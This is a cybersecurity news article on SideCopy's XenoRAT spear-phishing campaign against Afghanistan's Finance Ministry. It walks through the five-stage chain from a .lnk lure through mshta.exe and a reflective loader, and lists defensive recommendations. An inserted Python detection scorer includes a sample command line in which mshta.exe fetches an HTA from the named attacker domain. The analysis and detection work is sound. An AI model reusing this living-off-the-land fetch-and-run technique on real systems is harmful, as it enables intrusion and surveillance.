SideCopy APT Launches XenoRAT Cyberattack on Afghanistan’s Finance Ministry

In a meticulously orchestrated cyberattack, the Pakistan-linked Advanced Persistent Threat (APT) group known as SideCopy has targeted Afghanistan’s Ministry of Finance. This operation, identified as Operation XENOFISCAL, involved deploying the persistent remote access tool XenoRAT to infiltrate the Ministry’s provincial finance offices, known as Mustoufiats, across all 34 Afghan provinces.

Attack Methodology:

The intrusion commenced with spear-phishing emails sent to finance officials. These emails contained ZIP archives housing malicious shortcut files (.lnk) disguised with PDF icons and filenames in Pashto, the primary language of Afghan government communications. The deceptive filenames suggested the documents were lists of employees invited to seminars on psychological and intellectual warfare, indicating the attackers’ deep understanding of their targets’ operational environment.

Upon opening the shortcut file, the malware exploited mshta.exe—a legitimate Windows utility—to fetch a remote payload from a compromised Afghan educational domain. This technique, known as Living-off-the-Land (LotL), leverages trusted system tools to execute malicious code, thereby evading detection by security software.

Infection Chain:

The attack unfolded through a five-stage infection chain:

1. Initial Execution: The victim opens the malicious shortcut file, triggering mshta.exe to execute.

2. Payload Retrieval: Mshta.exe downloads an HTML Application (HTA) payload from the compromised domain abimj.edu.af.

3. Obfuscated Script Execution: The HTA file contains obfuscated JavaScript, which decodes itself in memory to evade detection.

4. Loader Deployment: The script drops a .NET-based loader DLL that continues the infection process.

5. Final Payload Delivery: The loader downloads an encoded, GZIP-compressed blob from attacker-controlled URLs, unpacks it in memory, and uses reflective loading to inject the final payload without writing it to disk.

This fileless approach significantly reduces the likelihood of detection by traditional antivirus solutions.
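As an added illustration (not code from the article or from Seqrite), the following Python scores constructed Sysmon-style process-creation events for the first two stages of the chain above: mshta.exe launched from explorer.exe, as a shortcut double-click would do, and fetching an HTA from a remote host. The event fields, the URL path, the local-file sample and the allowlist host are assumptions; only the domain abimj.edu.af comes from the report.

```python
import re
from urllib.parse import urlparse

# Constructed Sysmon Event ID 1 style records (not real telemetry from the campaign).
# The URL path is a placeholder: the report names only the domain abimj.edu.af.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" http://abimj.edu.af/placeholder.hta'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Users\u\Downloads\report.hta'},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Hosts from which an organisation knowingly serves HTAs (assumed; tune per environment).
ALLOWED_HOSTS = {"intranet.example.local"}


def score_event(ev):
    """Return (severity, reason) for one event; severity 0 means no finding."""
    image = ev.get("Image", "").lower()
    if not image.endswith(r"\mshta.exe"):
        return 0, ""
    cmd = ev.get("CommandLine", "")
    match = URL_RE.search(cmd)
    if not match:
        # mshta.exe running a local HTA is unusual but not by itself the campaign pattern.
        return 1, "mshta.exe executed a local HTA"
    host = urlparse(match.group(0)).hostname or ""
    if host in ALLOWED_HOSTS:
        return 1, f"mshta.exe fetched HTA from allowed host {host}"
    severity = 3
    reason = f"mshta.exe fetched remote HTA from {host}"
    parent = ev.get("ParentImage", "").lower()
    if parent.endswith(r"\explorer.exe"):
        # User-driven launch of mshta with a remote URL: consistent with the .lnk lure.
        severity = 4
        reason += " (launched from explorer.exe: shortcut/phishing pattern)"
    return severity, reason


def scan(events):
    """Return (severity, reason) pairs for every event that produced a finding."""
    return [(s, r) for s, r in (score_event(e) for e in events) if s > 0]
```

The `scan` output is ordered like the input, so the first record (remote HTA from explorer.exe) is the one to triage first.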

XenoRAT Capabilities:

Once deployed, XenoRAT establishes an encrypted connection to a command-and-control (C2) server located in Frankfurt, Germany. This infrastructure is deliberately separated from the initial delivery domain to maintain persistent access even if the delivery mechanism is discovered and neutralized.

XenoRAT is an open-source Remote Access Trojan (RAT) available on GitHub, offering a range of surveillance capabilities, including:

– System Information Gathering: Collecting detailed information about the infected system.

– File Management: Accessing, modifying, and exfiltrating files.

– Process Control: Managing running processes on the infected machine.

– Screen Capture: Taking screenshots of the victim’s desktop.

– Keylogging: Recording keystrokes to capture sensitive information.

Attribution and Context:

Analysts from Seqrite, in a report shared with Cyber Security News, have attributed this campaign to the SideCopy APT group with medium-to-high confidence. SideCopy operates under the broader Transparent Tribe umbrella, also known as APT36, a group with a documented history of targeting South Asian government institutions. Seqrite Labs has been monitoring this threat cluster for years as part of its global spear-phishing monitoring program.

This attack underscores the evolving tactics of state-sponsored threat actors who are increasingly leveraging open-source tools like XenoRAT to enhance their operational capabilities while minimizing development costs. The use of legitimate system utilities and fileless malware techniques highlights the need for advanced detection mechanisms that can identify and mitigate such sophisticated threats.

Implications and Recommendations:

The successful deployment of XenoRAT in this campaign poses significant risks, including unauthorized access to sensitive financial data, potential disruption of governmental operations, and the possibility of further exploitation through lateral movement within the network.

To mitigate such threats, organizations are advised to:

– Enhance Email Security: Implement advanced email filtering solutions to detect and block spear-phishing attempts.

– User Training: Conduct regular cybersecurity awareness training to help employees recognize and avoid phishing attacks.

– Endpoint Detection and Response (EDR): Deploy EDR solutions capable of identifying and responding to fileless malware and Living-off-the-Land techniques.

– Network Segmentation: Implement network segmentation to limit the spread of malware within the organization.

– Regular Updates: Ensure all systems and software are up-to-date with the latest security patches.

By adopting a multi-layered security approach, organizations can better defend against sophisticated cyber threats like those posed by the SideCopy APT group.